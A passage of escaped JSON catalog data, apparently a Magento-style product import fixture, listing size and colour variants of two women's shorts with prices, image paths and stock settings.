Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"bess-yoga-short-31-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh05-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh05-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh05-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=31,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh05-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh05-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"31\",\"color\":\"Yellow\"},\"1933\":{\"sku\":\"WSH05-32-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Bess Yoga Short-32-Blue\",\"description\":\"<p>Designed for intense physical activity &ndash; think bikram &ndash; our Bess Yoga Short features moisture-wicking, four-way stretch fabric that lets you move in every which way. A vented gusset adds breathability and range of motion.<\\/p>\\n<p>&bull; Navy cotton shorts with light bue waist detail.<br \\/>&bull; Front shirred waistband.<br \\/>&bull; Flat-lock, chafe-free side seams.<br \\/>&bull; Vented gusset.<br \\/>&bull; Hidden interior pocket.<br \\/>&bull; Sustainable and recycled fabric.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"bess-yoga-short-32-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh05-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh05-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh05-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/wsh05-blue_back.jpg\",\"image\":\"\\/w\\/s\\/wsh05-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh05-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/wsh05-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Blue\"},\"1934\":{\"sku\":\"WSH05-32-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Bess Yoga Short-32-Purple\",\"description\":\"<p>Designed for intense physical activity &ndash; think bikram &ndash; our Bess Yoga Short features moisture-wicking, four-way stretch fabric that lets you move in every which way. A vented gusset adds breathability and range of motion.<\\/p>\\n<p>&bull; Navy cotton shorts with light bue waist detail.<br \\/>&bull; Front shirred waistband.<br \\/>&bull; Flat-lock, chafe-free side seams.<br \\/>&bull; Vented gusset.<br \\/>&bull; Hidden interior pocket.<br \\/>&bull; Sustainable and recycled fabric.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"bess-yoga-short-32-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh05-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh05-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh05-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh05-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh05-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Purple\"},\"1935\":{\"sku\":\"WSH05-32-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Bess Yoga Short-32-Yellow\",\"description\":\"<p>Designed for intense physical activity &ndash; think bikram &ndash; our Bess Yoga Short features moisture-wicking, four-way stretch fabric that lets you move in every which way. A vented gusset adds breathability and range of motion.<\\/p>\\n<p>&bull; Navy cotton shorts with light bue waist detail.<br \\/>&bull; Front shirred waistband.<br \\/>&bull; Flat-lock, chafe-free side seams.<br \\/>&bull; Vented gusset.<br \\/>&bull; Hidden interior pocket.<br \\/>&bull; Sustainable and recycled fabric.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"bess-yoga-short-32-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh05-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh05-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh05-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh05-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh05-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Yellow\"},\"1936\":{\"sku\":\"WSH05\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Bess Yoga Short\",\"description\":\"<p>Designed for intense physical activity &ndash; think bikram &ndash; our Bess Yoga Short features moisture-wicking, four-way stretch fabric that lets you move in every which way. A vented gusset adds breathability and range of motion.<\\/p>\\n<p>&bull; Navy cotton shorts with light bue waist detail.<br \\/>&bull; Front shirred waistband.<br \\/>&bull; Flat-lock, chafe-free side seams.<br \\/>&bull; Vented gusset.<br \\/>&bull; Hidden interior pocket.<br \\/>&bull; Sustainable and recycled fabric.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh05-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh05-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh05-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_bottom=Basic,material=Cotton|CoolTech&trade;|Mesh,pattern=Solid-Highlight,climate=All-weather|Hot|Warm,eco_collection=No,performance_fabric=No,erin_recommends=No,new=No,sale=Yes\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WSH05-28-Blue,size=28,color=Blue|sku=WSH05-28-Purple,size=28,color=Purple|sku=WSH05-28-Yellow,size=28,color=Yellow|sku=WSH05-29-Blue,size=29,color=Blue|sku=WSH05-29-Purple,size=29,color=Purple|sku=WSH05-29-Yellow,size=29,color=Yellow|sku=WSH05-30-Blue,size=30,color=Blue|sku=WSH05-30-Purple,size=30,color=Purple|sku=WSH05-30-Yellow,size=30,color=Yellow|sku=WSH05-31-Blue,size=31,color=Blue|sku=WSH05-31-Purple,size=31,color=Purple|sku=WSH05-31-Yellow,size=31,color=Yellow|sku=WSH05-32-Blue,size=32,color=Blue|sku=WSH05-32-Purple,size=32,color=Purple|sku=WSH05-32-Yellow,size=32,color=Yellow\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/wsh05-blue_back.jpg\",\"image\":\"\\/w\\/s\\/wsh05-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh05-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/wsh05-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_bottom\":\"Basic\",\"material\":\"Cotton|CoolTech&trade;|Mesh\",\"pattern\":\"Solid-Highlight\",\"climate\":\"All-weather|Hot|Warm\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"Yes\"},\"1937\":{\"sku\":\"WSH06-28-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts\",\"product_websites\":\"base\",\"name\":\"Angel Light Running Short-28-Gray\",\"description\":\"<p>The Angel Light Running Short offers comfort in an ultra-lightweight, breathable package. With fabric infused with all-natural Cocona&reg; performance technology, it can whisk away sweat and block UV rays.<\\/p>\\n<p>&bull; Dark heather gray running shorts.<br \\/>&bull; Snug fit. <br \\/>&bull; Elastic waistband. <br \\/>&bull; Cocona&reg; performance fabric. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"angel-light-running-short-28-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh06-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh06-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh06-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/wsh06-gray_alt1.jpg,\\/w\\/s\\/wsh06-gray_back.jpg\",\"image\":\"\\/w\\/s\\/wsh06-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh06-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/wsh06-gray_alt1.jpg,\\/w\\/s\\/wsh06-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Gray\"},\"1938\":{\"sku\":\"WSH06-28-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts\",\"product_websites\":\"base\",\"name\":\"Angel Light Running Short-28-Orange\",\"description\":\"<p>The Angel Light Running Short offers comfort in an ultra-lightweight, breathable package. With fabric infused with all-natural Cocona&reg; performance technology, it can whisk away sweat and block UV rays.<\\/p>\\n<p>&bull; Dark heather gray running shorts.<br \\/>&bull; Snug fit. <br \\/>&bull; Elastic waistband. <br \\/>&bull; Cocona&reg; performance fabric. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"angel-light-running-short-28-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh06-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh06-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh06-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh06-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh06-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Orange\"},\"1939\":{\"sku\":\"WSH06-28-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts\",\"product_websites\":\"base\",\"name\":\"Angel Light Running Short-28-Purple\",\"description\":\"<p>The Angel Light Running Short offers comfort in an ultra-lightweight, breathable package. With fabric infused with all-natural Cocona&reg; performance technology, it can whisk away sweat and block UV rays.<\\/p>\\n<p>&bull; Dark heather gray running shorts.<br \\/>&bull; Snug fit. <br \\/>&bull; Elastic waistband. <br \\/>&bull; Cocona&reg; performance fabric. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"angel-light-running-short-28-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh06-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh06-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh06-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh06-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh06-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Purple\"},\"1940\":{\"sku\":\"WSH06-29-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts\",\"product_websites\":\"base\",\"name\":\"Angel Light Running Short-29-Gray\",\"description\":\"<p>The Angel Light Running Short offers comfort in an ultra-lightweight, breathable package. With fabric infused with all-natural Cocona&reg; performance technology, it can whisk away sweat and block UV rays.<\\/p>\\n<p>&bull; Dark heather gray running shorts.<br \\/>&bull; Snug fit. <br \\/>&bull; Elastic waistband. <br \\/>&bull; Cocona&reg; performance fabric. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"angel-light-running-short-29-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh06-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh06-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh06-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage